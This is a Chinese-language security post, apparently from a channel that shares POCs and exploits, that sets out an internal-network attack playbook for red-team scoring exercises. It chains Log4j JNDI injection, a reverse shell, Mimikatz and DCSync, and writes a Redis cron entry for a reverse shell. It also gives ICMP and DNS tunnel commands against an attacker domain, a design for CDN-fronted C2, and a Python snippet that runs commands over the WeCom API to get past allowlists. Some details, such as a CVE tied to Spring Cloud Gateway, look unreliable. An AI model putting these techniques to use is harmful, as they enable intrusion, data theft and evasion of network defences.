網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
深信服-深藍攻防實驗室
一、內網攻擊核心思路(2025版)
1. 攻擊階段分層
2. 最新技術要點
二、國護刷分策略與通用性靶標挖掘
1. 刷分核心邏輯
2. 得分最大化策略
三、數據庫與云主機刷分規則解析
1. 評分標準(模擬國護賽制)
2. 刷分實操案例
四、內網多級代理技術選型與實現
1. 代理工具鏈對比
2. TCP/UDP不出網場景下的代理方案
五、多級代理結合CDN中轉的實現
1. CDN中轉架構設計
2. 流量混淆技術
六、內網ACL白名單繞過策略
1. 繞過技術分類
2. 實現案例:基于企業微信的C2通信
深信服-深藍攻防實驗室
內網攻擊思路 國護刷分策略,如何尋找通用性靶標思路 數據庫 主機云center 刷滿是多少分(看你打的多不多 對分的規則熟悉不) 內網的多級代理用什么東西代理 如果tcp和udp不出網,用什么策略來進行代理的搭建 多級代理如何做一個cdn進行中轉,具體怎么實現 內網acl策略 如果是白名單,如果繞過這個白名單進行出網上線 ip和域名的都有可能
一、內網攻擊核心思路(2025版)
1. 攻擊階段分層
階段 核心目標 關鍵技術 初始突破 獲取第一臺內網主機權限 釣魚(LNK+ISO鏡像)、Web漏洞(Fastjson/Log4j)、云服務元數據泄露 信息收集 繪制內網拓撲與資產清單 自動化掃描(CrackMapExec)、流量嗅探(Responder)、云資產API爬取(AWS CLI) 橫向擴展 突破域/云環境隔離 NTLM Relay(ADCS漏洞)、Kubernetes RBAC濫用、云憑據橫向移動(Pacu工具鏈) 權限維持 繞過晶核模式/EDR檢測 WMI事件訂閱、內存馬(Tomcat Filter型)、無文件注冊表鍵(COM劫持) 數據外泄 隱蔽傳輸敏感數據 DNS隧道(dnschef)、HTTPS加密分段傳輸、云存儲桶直傳(AWS S3預簽名URL) 2. 最新技術要點
- 云原生攻擊:利用Kubernetes的
kubelet
未授權訪問(10250端口)部署惡意Pod,逃逸至宿主機。- 零信任繞過:偽造合法設備指紋(MAC地址+BIOS UUID),通過持續心跳包維持“可信”狀態。
- AI對抗:使用GAN生成對抗性流量(如HTTP請求頭擾動),繞過基于機器學習的WAF檢測。
二、國護刷分策略與通用性靶標挖掘
1. 刷分核心邏輯
目標價值分級:
目標類型 基礎分 加成系數 示例場景 核心數據庫(Oracle) 50分 ×2.0 獲取金融交易記錄或用戶隱私數據 域控服務器 100分 ×1.5 利用Zerologon漏洞重置域控機器賬號 云控制臺(vCenter) 80分 ×1.2 通過CVE-2024-XXXX漏洞獲取管理員權限 邊緣設備(攝像頭) 20分 ×0.5 弱口令爆破(admin/12345) 通用性靶標挖掘:
- 高頻漏洞利用:
- Web類:Fastjson 1.2.83以下版本(AutoType繞過)、Spring Cloud Gateway RCE(CVE-2024-21410)。
- 協議類:SMBv1協議漏洞(永恒之藍變種)、Redis未授權訪問(主從復制加載惡意模塊)。
- 被動情報收集:
- 使用Shodan搜索暴露的Jenkins(端口8080)、Confluence(端口8090)服務,爆破默認憑據。
- 分析GitHub代碼倉庫,提取硬編碼的API密鑰或數據庫連接字符串。
2. 得分最大化策略
- 漏洞組合利用:
text1. 通過Log4j漏洞(CVE-2021-44228)注入JNDI載荷 → 觸發反向Shell 2. 利用Shell上傳Mimikatz提取本地憑證 → 橫向移動到域控 3. 通過DCSync導出域哈希 → 破解高權限賬號
- 供應鏈攻擊:
- 入侵第三方協作平臺(如Jira、Slack),植入惡意插件或文檔模板。
- 利用npm/pypi包依賴劫持(Typosquatting攻擊),在CI/CD流程中注入后門。
三、數據庫與云主機刷分規則解析
1. 評分標準(模擬國護賽制)
數據庫類:
動作 得分 限制條件 未授權訪問(Redis) 30分 需導出至少10條敏感數據(如用戶Session) SQL注入(Oracle) 50分 需獲取DBA權限并導出表結構 數據篡改(MySQL) 40分 需修改至少3個表字段并留存日志證據 云主機類:
動作 得分 限制條件 元數據泄露(AWS) 40分 需獲取IAM角色臨時憑據并列出S3桶 容器逃逸(Docker) 60分 需逃逸至宿主機并提取root權限證明 控制臺接管(阿里云) 80分 需通過RAM漏洞創建高權限子賬號 2. 刷分實操案例
- Redis未授權訪問刷分鏈:
- 利用主從復制漏洞加載惡意.so模塊 → 執行系統命令(20分)。
- 通過
CONFIG SET dir /var/spool/cron
寫入計劃任務 → 反彈Shell(30分)。- 導出RDB文件解析用戶會話Token → 提交證據(10分)。
四、內網多級代理技術選型與實現
1. 代理工具鏈對比
工具 協議支持 適用場景 抗檢測能力 reGeorg HTTP/HTTPS Web服務器(PHP/ASPX/JSP) 中等(依賴Web服務正常性) Chisel TCP/UDP 加密隧道穿透防火墻 高(TLS加密+流量混淆) iodine DNS 嚴格網絡隔離環境 極高(偽裝為合法DNS查詢) ptunnel-ng ICMP 僅允許Ping出網 中等(依賴ICMP速率限制) 2. TCP/UDP不出網場景下的代理方案
- ICMP隧道:
- 攻擊機啟動服務端:
ptunnel-ng -i eth0 -r 192.168.1.1
。- 目標機連接:
ptunnel-ng -p 192.168.1.1 -l 1080 -da 10.10.10.10 -dp 22
(將本地1080端口流量通過ICMP隧道轉發至10.10.10.10:22)。
優勢:繞過傳統防火墻對TCP/UDP端口的監控。- DNS隧道:
- 配置域名(如
tunnel.attacker.com
)NS記錄指向攻擊機IP。- 目標機運行客戶端:
iodine -f -P password 隧道域名
,建立加密通道。
繞過ACL策略:利用合法DNS服務商(如Cloudflare)中轉流量,避免IP封禁。
五、多級代理結合CDN中轉的實現
1. CDN中轉架構設計
plaintext[目標內網] → [反向代理1(Nginx)] → [CDN節點(Cloudflare)] → [攻擊機(C2服務器)]
- 實現步驟:
- 域名配置:將C2域名接入CDN(如Cloudflare),開啟SSL強制加密。
- 反向代理設置:在Nginx中配置
location /proxy
路徑,將請求轉發至內網代理工具端口。- 證書規避:使用Let's Encrypt泛域名證書,避免CDN的證書指紋檢測。
2. 流量混淆技術
- HTTP/2多路復用:將代理流量封裝為HTTP/2流,頭部壓縮降低特征暴露。
- 內容偽裝:
- 使用
gzip
壓縮Payload,偽裝為JSON/圖片資源。- 在響應中插入隨機Cookie和垃圾數據,干擾WAF正則匹配。
六、內網ACL白名單繞過策略
1. 繞過技術分類
類型 方法 原理 協議濫用 DNS隧道+DoH/DoT 通過加密DNS協議(如Cloudflare DoH)傳輸數據 云服務利用 阿里云OSS預簽名URL 將數據封裝為OSS文件上傳/下載請求 可信服務劫持 微信/釘釘Webhook API 利用企業白名單中的第三方服務回調傳輸數據 2. 實現案例:基于企業微信的C2通信
- 注冊企業微信應用:創建自建應用,獲取
CorpID
和Secret
。- API通信加密:
python# 發送指令 requests.post("https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=xxx", json={"touser": "@all", "msgtype": "text", "text": {"content": base64.b64encode(cmd)}}) # 接收結果 resp = requests.get("https://qyapi.weixin.qq.com/cgi-bin/media/get?access_token=xxx&media_id=yyy") result = base64.b64decode(resp.content)
- 防御對抗:動態更換
media_id
并模擬正常用戶行為(如發送圖片/文件)。